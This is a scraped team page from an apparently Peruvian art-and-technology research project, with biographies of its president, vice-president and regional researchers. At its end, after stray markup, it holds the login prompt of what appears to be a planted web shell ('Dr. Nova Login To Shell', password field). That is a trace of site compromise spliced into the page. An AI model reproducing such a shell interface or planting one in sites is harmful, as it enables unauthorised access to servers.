Equipo

Error message

Deprecated function: The each() function is deprecated. This message will be suppressed on further calls in menu_set_active_trail() (line 2292 of /var/www/insularesdivergentes.org/includes/menu.inc).

Jorge Villacorta
Presidente de ATA / Investigador Principal

Crítico de arte y curador independiente. Titulado en genética en la Universidad de York, Gran Bretaña, ha desarrollado paralelamente a si actividad científica un fuerte interés en la investigación en artes visuales contemporáneas en el Perú. Desde 1997, es Profesor de Arte y Comunicación en la Maestría de Comunicaciones, en la Escuela de Graduados de la Pontifica Universidad Católica del Perú. Desde 1999, es profesor en el Seminario de Interrelación de las Artes, Facultad de Artes Plásticas de la Universidad Católica. Fue profesor de Historia de la Fotografía en el Instituto Gaudí de 1993 a 1998. Fue asesor de Parafernalia S.R.L., galería de arte, entre 1993 y 1997. Ha tenido a su cargo la organización de distintas exposiciones, entre ellas: Desplazamientos / Carlos Runcie Tanaka (curaduría); Luz Cuerpo Materia / Xawiery Wolsky 9curaduría); Lo Sagrado de lo Profano (Co-curaduría); La Palabra del Otro (Co-curaduría); Carlos Revilla: Retrospectiva 1955 -  1995 (Co-curaduría); Horizontes Paralelos (Co-curaduría); Documentos: Tres Décadas de Fotografía Peruana 1960 – 1990 (Co-curaduría); ¿¡Kontrakultura!? / Herbert Rodríguez: Retrospectiva del Arte alternativo en Lima, 1979 – 1997 (curaduría); Iter Erraticus / Alberto Casari: Retrospectiva 1977 – 1993 (curaduría); Billy Hare: Fotografías (curaduría); Ramiro Llona: Retrospectiva 1973 – 1998 (curaduría); Naturaleza Artificial (curaduría); Geografía de los No-Lugares (curaduría); Pacto con el Momento Incierto (Co-curaduría). En 1999, como miembro de Espacios & Márgenes, realizó la co-curaduría de una panorámica de las artes visuales peruianas de 1979 a 1999, compuesta por cinco exposiciones temátias, dentro del proyecto El Laberinto de la Choledad. Reside en Lima y labora en el Banco de Tejidos del Instituto de Salud del Niño. Dsde enero de este año, preside la Asociación quidam acción cultural, encargada de la gestión de la Sala Luis Miró Quesada Garl;and de la Municipalidad de Miraflores, Lima, Perú.

José-Carlos Mariátegui

Vice-presidente de ATA / Director de Investigación
Científico y teórico en nuevos medios.  Estudió Biología y Matemáticas Aplicadas en la Universidad Peruana Cayetano Heredia (Lima) y un Master en Sistemas de Información en la London School of Economics – LSE (Londres), en donde en la actualidad investiga y es candidato a doctorado en una investigación sobre las consecuencias tecnológicas y socio-económicas del crecimiento de información en la industria de los medios (http://www.tigair.info).  Es miembro fundador de Alta Tecnología Andina – ATA (www.ata.org.pe), dedicada al desarrollo de proyectos en arte, ciencia y tecnología en América Latina y de ATA Escuelab (www.escuelab.org) una escuela avanzada de formación, innovación e investigación.  Vice-Presidente del Acervo Leistenschneider, la principal colección de artes y ciencias precolombinas (www.acervoprecolombino.org). Anteriormente ha sido miembro de la Comisión Nacional de Cultural del Gobierno del Perú (2001-2002), Director - Fundador de la Casa Museo José Carlos Mariategui (1995-2005) y fundador del Festival Internacional de Video/Arte/Electronica de Lima (www.festivalvae.com). Curador de exhibiciones de arte y tecnología a nivel internacional como:“Nueva/Vista: Videokunst aus Lateinamerica; “ViaSatelite” (www.viasateliteperu.org); “Videografias In(visibles) (www.videografiasinvisibles.org), "Emergentes" (laboralcentrodearte.org/emergentes/).  Actuó como nodo del proyecto Tester (www.e-tester.net).  Ha sido miembro del jurado de Videobrasil, Ars Electronica, Competencia VIDA de Fundación Telefónica, Ojo de Iberoamerica, FIAP, entre otros.  Es miembro del Network Committee del Prince Claus Fund (Holanda) y del Advisory Council de Third Text (UK). Vive en Lima y Londres.
 
Enrique Mayorga
R + D Director at ATA / Investigador (Región Andina)
Studied electronic engineering at the Pontificia Universidad Católica del Perú.  Since then, he took part in several projects that explore interaction among individuals, groups, systems, information, spaces, and moments.  Since 2003, worked jointly with José Carlos Martinat on a series titled stereo reality environments which is a group of interventions that play with the relation between the object-being and its tendency toward a permutation of functions. The 2nd stereo reality environment received the 2005 VIDA Contest Incentive for New Productions Award.  His work has been shown in exhibits and festivals including: ISEA2002 (Japan), Contacto (2003, Peru), VIDA (2004, Spain), VAE (2005, Peru), Emergentes (2007, Spain), and DELIVERI (2008, Peru).

María José Monge
Investigadora (
Región Centro Américana)
MSc en Antropología y Bachiller en Historia del arte. Consultora independiente en los ámbitos de arte y cultura. Durante varios años laboró en el Museo de Arte y Diseño Contemporáneo (MADC) de Costa Rica, plataforma desde la que participó en el diseño y la producción de diversos proyectos orientados a estimular, promocionar y difundir las artes visuales centroamericanas contemporáneas, entre estas, cabe destacar eventos como ¿Qué Centroamérica?: una región a debate (2006); la 1ra y 2da muestra centroamericana de Arte Emergente (2004, 2006); el 2do y 3er concurso centroamericano de videocreación Inquieta Imagen (2003, 2004); la 4ta muestra centroamericana de videocreación y arte digital Inquieta Imagen (2005, 2007) y los programas Asedios Críticos (2003-2008), Confluencias (2005-2008) y En la CALLE. Apropiaciones de espacios públicos (2008). Ha co-curado muestras como Las hijas de Eva (Museo Castillo de Santa Catalina, Cádiz, 2008); Prácticas al margen/estéticas en construcción (Galería Blassini, Venezuela; Galería DPM, Ecuador; Galería Mateo Sariel, Panamá; Centro Cultural de España, Guatemala; 2006); La máquina de hacer niebla (MADC, 2005) o Las posibilidades de la mirada, (Museo de Arte Costarricense, 2003-2005). También se ha desempeñado en el área de la docencia en la Carrera de fotografía del Colegio Universitario de Alajuela y en la Universidad Nacional a Distancia, y ha publicado ensayos sobre arte costarricense contemporáneo en revistas y catálogos especializados.

 

Victoria Messi
Investigadora (
Región Sur)
Nació en la Ciudad de Buenos Aires en 1981. Licenciada en Artes Plástica por la Universidad de Buenos Aires. Está completando su maestría en Ciencia, Tecnología y Sociedad en la Universidad Nacional de Quilmes. Coordinadora Académica de la Maestría en Tecnología y Estética de las Artes Electrónicas de la Universidad Nacional de Tres de Febrero (www.maestriaenartes.com.ar). Profesora titular de la materia “Lenguajes no-lineales” en dicha maestría. Representante internacional por la Argentina del Leonardo Education Forum. Autora y desarrolladora del sitio El Pez Eléctrico (www.elpezelectrico.com) donde publica artículos, videos y textos originales sobre arte, cultura y tecnología.
Fue profesora adjunta en la Licenciatura en Artes Electrónicas de la UNTREF. Coordinadora de Emergentes, exhibición itinerante de arte electrónico latinoamericano producida por la Fundación Telefónica. Ha asistido en la curaduría y producción de varias muestras de arte medial, video y fotografía en la Argentina. Trabajó en el área de producción del Museo de Arte Moderno de Buenos Aires. Escribe textos sobre arte y nuevos medios, publicados en catálogos y revistas de diversos países. Realizó la coordinación editorial de varias publicaciones y libros sobre arte contemporáneo, nuevos medios y fotografía. Presentó sus videos en diversos festivales y exhibiciones en la Argentina, Francia, España, Inglaterra, Perú y Costa Rica. Vive y trabaja en la Ciudad de Buenos Aires.

<xmp><body></xmp><xmp></body></html></xmp>Dr. Nova Login To Shell

Dr. Nova ShellCode
| Please Password |